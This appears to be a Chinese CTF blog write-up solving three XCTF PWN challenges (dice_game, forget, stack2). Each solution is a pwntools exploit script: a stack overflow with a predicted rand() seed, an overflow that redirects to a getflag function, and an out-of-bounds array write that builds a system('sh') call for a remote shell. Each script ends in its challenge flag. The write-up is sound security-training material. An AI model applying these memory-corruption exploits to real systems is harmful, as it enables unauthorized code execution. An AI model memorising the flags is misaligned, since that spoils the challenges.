Fork me on GitHub

攻防世界PWN高手进阶区

dice_game

溢出+随机数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *
from ctypes import *
import re

context.log_level = 'Debug'

libc = cdll.LoadLibrary("libc.so.6")

#io = process('./dice_game')
io = remote('111.198.29.45', '43224')

payload = 'a' * 0x40 + p64(1)
io.sendlineafter("Welcome, let me know your name: ", payload)

libc.srand(1)
for i in range(50):
randnum = (libc.rand()) % 6 + 1
io.sendlineafter("point(1~6): ", str(randnum))

io.recvline()
io.recvline()
flag = io.recvline()
print flag

flag

1
cyberpeace{d852e3567fa642894b4bad82042d53a5}

forget

溢出,将v3修改为getflag的函数的地址,使用\x47作为padding即可使得v14为1

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *

context.log_level = 'Debug'

#io = process('./forget')
io = remote('111.198.29.45', '32456')

payload = '\x47' * 32 + p32(0x080486CC)

io.sendlineafter('>', 'hvnt3r')
io.sendlineafter('Enter the string to be validate\n>', payload)

io.recvline()

flag

1
cyberpeace{36db2d4142ff5529b834e236e2e3c641}

stack2

数组未检查范围导致溢出:

1
2
3
4
5
puts("which number to change:");
__isoc99_scanf("%d", &v5);
puts("new number:");
__isoc99_scanf("%d", &v7);
v13[v5] = v7;

下断点确认v13起始地址与ebp的距离为0x84,构造sh的system函数栈帧。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from pwn import *

context.log_level = 'Debug'

io = process('./6abe739ff2af4a7fa6b3c89904389817')
io = remote('111.198.29.45', '48396')

io.sendlineafter('How many numbers you have:\n', '1')
io.sendlineafter('Give me your numbers\n', '1')

def write_addr(offset, byte):
io.sendlineafter('5. exit\n', '3')
io.sendlineafter('which number to change:\n', str(offset))
io.sendlineafter('new number:\n', str(byte))

#08048450 sys_plt
write_addr(0x84, 0x50)
write_addr(0x85, 0x84)
write_addr(0x86, 0x04)
write_addr(0x87, 0x08)

#08048987 string_sh
write_addr(0x84 + 8, 0x87)
write_addr(0x85 + 8, 0x89)
write_addr(0x86 + 8, 0x04)
write_addr(0x87 + 8, 0x08)

io.sendlineafter('5. exit\n', '5')

io.interactive()

flag

1
cyberpeace{4331b59d20df98308bc8ad86307b27a4}
您的支持是我最大的动力🍉